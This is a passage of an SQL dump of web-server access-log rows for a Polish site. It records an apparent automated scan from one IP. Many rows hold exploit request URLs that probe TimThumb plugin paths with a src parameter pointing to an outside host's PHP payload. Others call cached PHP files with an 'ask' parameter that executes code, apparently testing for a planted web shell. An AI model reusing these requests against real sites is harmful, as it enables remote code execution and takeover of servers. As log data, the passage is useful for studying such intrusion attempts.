AppleWebKit/535.21 (KHTML, like Gecko) Chrome/19.0.1041.0 Safari/535.21','http://www.pc-one.pl/'),(96578,'2016-02-13 14:59:29','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.702.0 Chrome/12.0.702.0 Safari/534.24','http://www.pc-one.pl/'),(96579,'2016-02-13 14:59:29','109.190.140.153','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.04 Chromium/15.0.871.0 Chrome/15.0.871.0 Safari/535.2','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/inc/thumb.php?src=http://superpupblogger.comxa.com/s.php'),(96580,'2016-02-13 14:59:29','109.190.140.153','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/timthumb.phptimthumb.php?src=http://superpupblogger.comxa.com/s.php'),(96581,'2016-02-13 14:59:29','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/scripts/thumb.php?src=http://superpupblogger.comxa.com/s.php'),(96582,'2016-02-13 14:59:29','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.702.0 Chrome/12.0.702.0 Safari/534.24','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/inc/thumb.php?src=http://superpupblogger.comxa.com/s.php'),(96583,'2016-02-13 14:59:29','109.190.140.153','','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.655.0 Safari/534.17','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/timthumb.php?src=http://superpupblogger.comxa.com/s.php'),(96584,'2016-02-13 14:59:29','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11','http://www.pc-one.pl/'),(96585,'2016-02-13 14:59:29','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11','http://www.pc-one.pl/'),(96586,'2016-02-13 14:59:29','109.190.140.153','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24','http://www.pc-one.pl/'),(96587,'2016-02-13 14:59:29','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.702.0 Chrome/12.0.702.0 Safari/534.24','http://www.pc-one.pl/'),(96588,'2016-02-13 14:59:29','109.190.140.153','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.04 Chromium/15.0.871.0 Chrome/15.0.871.0 Safari/535.2','http://www.pc-one.pl/'),(96589,'2016-02-13 14:59:29','109.190.140.153','','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.655.0 Safari/534.17','http://www.pc-one.pl/'),(96590,'2016-02-13 14:59:30','109.190.140.153','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.809.0 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/thumb.php?src=http://superpupblogger.comxa.com/s.php'),(96591,'2016-02-13 14:59:30','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/functions/timthumb.php?src=http://superpupblogger.comxa.com/s.php'),(96592,'2016-02-13 14:59:30','109.190.140.153','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/functions/thumb.php?src=http://superpupblogger.comxa.com/s.php'),(96593,'2016-02-13 14:59:30','109.190.140.153','','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=http://superpupblogger.comxa.com/s.php'),(96594,'2016-02-13 14:59:30','109.190.140.153','','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/scripts/timthumb.php?src=http://superpupblogger.comxa.com/s.php'),(96595,'2016-02-13 14:59:30','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/10.04 Chromium/14.0.804.0 Chrome/14.0.804.0 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/scripts/timthumb.php?src=http://superpupblogger.comxa.com/s.php'),(96596,'2016-02-13 14:59:30','109.190.140.153','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/scripts/thumb.php?src=http://superpupblogger.comxa.com/s.php'),(96597,'2016-02-13 14:59:30','109.190.140.153','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/timthumb.php?src=http://superpupblogger.comxa.com/s.php'),(96598,'2016-02-13 14:59:30','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=http://superpupblogger.comxa.com/s.php'),(96599,'2016-02-13 14:59:30','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/timthumb.phptimthumb.php?src=http://superpupblogger.comxa.com/s.php'),(96600,'2016-02-13 14:59:30','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/thumb.php?src=http://superpupblogger.comxa.com/s.php'),(96601,'2016-02-13 14:59:31','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/functions/timthumb.php?src=http://superpupblogger.comxa.com/s.php'),(96602,'2016-02-13 14:59:31','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96603,'2016-02-13 14:59:31','109.190.140.153','','Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/11.0.696.50','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96604,'2016-02-13 14:59:31','109.190.140.153','','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7','http://www.pc-one.pl/'),(96605,'2016-02-13 14:59:31','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/inc/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96606,'2016-02-13 14:59:31','109.190.140.153','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2','http://www.pc-one.pl/'),(96607,'2016-02-13 14:59:31','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/10.04 Chromium/14.0.804.0 Chrome/14.0.804.0 Safari/535.1','http://www.pc-one.pl/'),(96608,'2016-02-13 14:59:31','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.0 Safari/534.24','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96609,'2016-02-13 14:59:31','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1','http://www.pc-one.pl/'),(96610,'2016-02-13 14:59:31','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24','http://www.pc-one.pl/'),(96611,'2016-02-13 14:59:31','109.190.140.153','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','http://www.pc-one.pl/'),(96612,'2016-02-13 14:59:31','109.190.140.153','','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.660.0 Safari/534.18','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/scripts/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96613,'2016-02-13 14:59:32','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/inc/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96614,'2016-02-13 14:59:32','109.190.140.153','','Mozilla/5.0 (X11; CrOS i686 13.587.48) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.43 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/inc/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96615,'2016-02-13 14:59:32','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/inc/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96616,'2016-02-13 14:59:32','109.190.140.153','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.809.0 Safari/535.1','http://www.pc-one.pl/'),(96617,'2016-02-13 14:59:32','109.190.140.153','','Mozilla/5.0 (Windows NT 6.1; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.750.0 Safari/534.30','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/scripts/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96618,'2016-02-13 14:59:32','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24','http://www.pc-one.pl/'),(96619,'2016-02-13 14:59:32','109.190.140.153','','Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/11.0.696.50','http://www.pc-one.pl/'),(96620,'2016-02-13 14:59:32','109.190.140.153','','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24','http://www.pc-one.pl/'),(96621,'2016-02-13 14:59:32','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/scripts/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96622,'2016-02-13 14:59:32','109.190.140.153','','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/scripts/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96623,'2016-02-13 14:59:33','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/scripts/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96624,'2016-02-13 14:59:33','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','http://www.pc-one.pl/'),(96625,'2016-02-13 14:59:33','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96626,'2016-02-13 14:59:33','109.190.140.153','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3','http://www.pc-one.pl/'),(96627,'2016-02-13 14:59:33','109.190.140.153','','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.660.0 Safari/534.18','http://www.pc-one.pl/'),(96628,'2016-02-13 14:59:33','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/inc/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96629,'2016-02-13 14:59:33','109.190.140.153','','Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96630,'2016-02-13 14:59:33','109.190.140.153','','Mozilla/5.0 (X11; CrOS i686 13.587.48) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.43 Safari/535.1','http://www.pc-one.pl/'),(96631,'2016-02-13 14:59:33','109.190.140.153','','Mozilla/5.0 (Windows NT 6.1; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.750.0 Safari/534.30','http://www.pc-one.pl/'),(96632,'2016-02-13 14:59:33','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11','http://www.pc-one.pl/'),(96633,'2016-02-13 14:59:33','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.794.0 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96634,'2016-02-13 14:59:33','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11','http://www.pc-one.pl/'),(96635,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.660.0 Safari/534.18','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/functions/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96636,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/functions/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96637,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3','http://www.pc-one.pl/'),(96638,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/inc/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96639,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/scripts/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96640,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','http://www.pc-one.pl/'),(96641,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/11.0.696.50','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96642,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24','http://www.pc-one.pl/'),(96643,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16','http://www.pc-one.pl/'),(96644,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.31 (KHTML, like Gecko) Chrome/13.0.748.0 Safari/534.31','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/inc/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96645,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.0 Safari/534.24','http://www.pc-one.pl/'),(96646,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96647,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96648,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.812.0 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/functions/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96649,'2016-02-13 14:59:34','109.190.140.153','','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/scripts/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96650,'2016-02-13 14:59:35','109.190.140.153','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.43 Safari/534.24','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96651,'2016-02-13 14:59:35','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/functions/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96652,'2016-02-13 14:59:35','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.794.0 Safari/535.1','http://www.pc-one.pl/'),(96653,'2016-02-13 14:59:35','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','http://www.pc-one.pl/'),(96654,'2016-02-13 14:59:35','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30','http://www.pc-one.pl/'),(96655,'2016-02-13 14:59:35','109.190.140.153','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.700.3 Safari/534.24','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/functions/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96656,'2016-02-13 14:59:35','109.190.140.153','','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/inc/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96657,'2016-02-13 14:59:35','109.190.140.153','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/functions/thumb.php?src=http://superpupblogger.comxa.com/s.php'),(96658,'2016-02-13 14:59:35','109.190.140.153','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.21 (KHTML, like Gecko) Chrome/19.0.1042.0 Safari/535.21','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/functions/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96659,'2016-02-13 14:59:35','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/scripts/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96660,'2016-02-13 14:59:35','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11','http://www.pc-one.pl/'),(96661,'2016-02-13 14:59:35','109.190.140.153','','Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/11.0.696.50','http://www.pc-one.pl/'),(96662,'2016-02-13 14:59:36','109.190.140.153','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3','http://www.pc-one.pl/'),(96663,'2016-02-13 14:59:36','109.190.140.153','','Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1','http://www.pc-one.pl/'),(96664,'2016-02-13 14:59:36','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1','http://www.pc-one.pl/'),(96665,'2016-02-13 14:59:36','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.31 (KHTML, like Gecko) Chrome/13.0.748.0 Safari/534.31','http://www.pc-one.pl/'),(96666,'2016-02-13 14:59:36','109.190.140.153','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_3) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/cache/6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96667,'2016-02-13 14:59:36','109.190.140.153','','Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','http://www.pc-one.pl/'),(96668,'2016-02-13 14:59:36','109.190.140.153','','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1','http://www.pc-one.pl/'),(96669,'2016-02-13 14:59:36','109.190.140.153','','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24','http://www.pc-one.pl/'),(96670,'2016-02-13 14:59:36','109.190.140.153','','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21','http://www.pc-one.pl/wp-content/plugins/wp-pagenavi/cache/external_6caabda42788e7aaaf360656bba84ed2.php?ask=echo%20%27xx23423%27.%272xxcv3%27.%27dcfxcx2xdf%27;die();'),(96671,'2016-02-13 14:59:36','109.190.140.153','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.812.0 Safari/535.1','http://www.pc-one.pl/'),(96672,'2016-02-13 14:59:36','109.190.140.153','','Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1','http://www.pc-one.pl/'),(96673,'2016-02-13 14:59:36','109.190.140.153','','Mozilla/5.0 (Macintosh; U; 